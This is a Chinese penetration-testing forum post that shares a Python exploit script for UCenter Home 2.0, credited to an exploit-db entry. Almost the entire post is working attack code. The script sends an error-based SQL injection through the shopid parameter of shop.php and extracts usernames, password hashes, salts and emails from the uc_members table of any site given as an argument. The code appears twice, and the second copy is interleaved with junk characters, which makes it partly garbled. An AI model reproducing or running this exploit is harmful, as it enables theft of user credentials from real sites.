找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1958|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
  B3 x+ {  R; p' \2 V/ R
1 f& a- H3 D- g9 N% U
! Y" ?+ F- J1 i' u#!/usr/bin/env python  * a9 D+ p5 P$ W5 }
( w/ W0 O  W* B  e* w) s
import sys  
1 c4 k1 Y  E8 s. e) K+ _' Rimport urllib2  
( T/ P( L0 v3 _9 t4 r" O, E2 Mimport re  ! o% W: P; R9 X! W! p: O) D

# g1 {; d/ \, B" c! jdef info():  
4 B, E9 G9 W9 Y0 f" G2 [% g    print 'From:http://www.exploit-db.com/exploits/14997/'
7 g* e/ q2 y- W/ Y8 ~( h    print 'http://www.hake.cc/Web_loudong/'
% O+ r3 t" W$ [" D5 f1 }2 E    print 'changed:qiaoy'  3 Q0 b) I: V3 K0 h* p" {( G
    print 'exp:'  " E- c# D# r- m7 _+ d5 u
    print ' ./UCenter_Home_2.0.py site'  
8 ?+ O( i0 W5 h7 u" B
3 ~- f( q7 Z& {, Q6 Ndef main():  
8 T# ]+ g6 g* @" f2 {* }9 x    if len(sys.argv) != 2:  
4 p# `. A: y& [0 l        info()  3 O' H' _9 f0 S7 F( c) W1 I/ Q
    else:  
: F0 I  u. o' S; J        site = sys.argv[1]  ' D4 E1 ]8 O0 Q* R
        if site[0:7] == 'http://':  
1 l' w  V" F2 l) w            sitesite =site  * R, ]1 j8 q! x( ]2 r
        elif site[0:8] == 'https://':  1 P( U: F) P( F  f$ @3 |+ G
            sitesite = site  + q, \: _# H( ~3 R' O9 w  i# t. N
        else:  
4 I: Y; \5 [) _; a' y            site = 'http://'+site  
  q- B; W" p5 m7 R, L        try:  3 C4 b/ [+ J8 }5 a/ Z6 a% V
            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  
5 P5 o; N$ E+ w( Z6 T5 ^" _            Value = urllib2.urlopen(url).read()  & ?, V, B7 d/ x. O) l6 j4 E
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
/ X5 w- `6 m4 Y3 k            hacked = Msg.split(':')  2 z/ @% Z2 N# J  w
            print 'Name:    '+hacked[1]  
# M4 s& e1 ~' K6 L1 w# p            print 'Passwd:  '+hacked[2]  
- v! J6 _5 `/ k" Z) S+ r* s& }            print 'salt:    '+hacked[3]  1 R$ F3 a4 N1 ]& \8 x/ |2 T
            print 'email:   '+hacked[4]  
- |, Q7 P9 Q: {9 x% G9 [        except:  
1 n4 ?$ `$ S( o* F* I            print 'Sorry,I can\'t work............'  # b1 J4 I5 K8 _! g. m& t9 K  S
/ ?. a. q: [$ x. k; P# c
if __name__ == '__main__':  6 l' G* l3 R3 V% ]7 c+ B# T5 l
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表